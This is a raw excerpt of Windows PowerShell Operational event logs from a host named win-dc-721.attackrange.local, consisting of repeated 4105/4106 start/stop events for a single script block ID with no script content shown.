ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475387
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475386
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475385
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475384
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475383
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475382
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475381
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475380
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475379
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475378
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475377
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475376
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475375
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475374
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475373
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475372
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475371
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475370
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475369
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475368
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475367
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475366
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475365
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475364
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475363
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475362
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475361
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475360
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475359
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475358
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475357
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475356
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475355
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475354
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475353
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475352
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475351
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475350
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475349
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475348
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475347
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475346
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475345
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475344
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475343
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475342
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475341
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475340
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475339
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475338
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475337
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475336
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475335
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475334
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475333
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
